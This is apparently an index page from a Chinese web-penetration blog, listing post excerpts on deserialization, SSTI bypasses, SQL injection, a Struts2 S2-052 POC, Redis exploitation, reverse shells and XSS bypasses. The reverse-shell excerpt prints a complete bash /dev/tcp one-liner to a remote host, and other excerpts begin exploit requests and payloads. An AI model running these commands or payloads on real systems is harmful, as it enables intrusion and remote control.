分类 Web渗透 下的文章:

Java反序列化学习之Apache Commons Collections
发表于: | 分类: Web渗透,代码审计 | 评论:0 | 阅读: 219
0x00 Java中的反序列化readObject在PHP中反序列化漏洞基本上是利用魔术方法,在进行反序列化的时候结合后面的一些操作从而自动调用某些魔术方法,在Java中我目前只知道toString()方法,和PHP中的__toString()是有相同作用的,没有...

阅读全文>>

Flask/Jinja2模板注入中的一些绕过姿势
发表于: | 分类: 技术分享,Web渗透 | 评论:0 | 阅读: 4807
好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。0x00 获取基本类首先通过str、dict、tuple或list获取pytho...

阅读全文>>

SQL注入备忘手册(更新2017-12-11)
发表于: | 分类: 技术分享,Web渗透 | 评论:8 | 阅读: 4667
SQL备忘录,平时查阅用,随时更新。1 MySQL1.1 常用信息及语句当前用户:user() 数据库版本:version() 数据库名: database() 操作系统:@@version_compile_os 所有用户: select group_c...

阅读全文>>

S2-052 POC
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1580
POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1 Host: 192.168.2.108:8080 User-Agent: Mozil...

阅读全文>>

利用order by 进行盲注
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 2541
0x01 利用场景登录代码:$username = $_POST['username']; $password = $_POST['password']; if(filter($username)){ //过滤括号 }else{ $sql=&quo...

阅读全文>>

redis未授权访问漏洞利用总结
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 4837
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开...

阅读全文>>

反弹shell的几种姿势
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1640
bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意某些linux不支持perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;s...

阅读全文>>

XSS绕过分析
发表于: | 分类: Web渗透 | 评论:0 | 阅读: 1579
0x00 前言本文介绍简单xss利用及其绕过,几个案例,都是比较简单的,绕过方法分享给大家0x01 分析1、无安全方面的限制,直接使用关键代码:<?php @$id = $_GET['id']; echo $id;payload:<script>...

阅读全文>>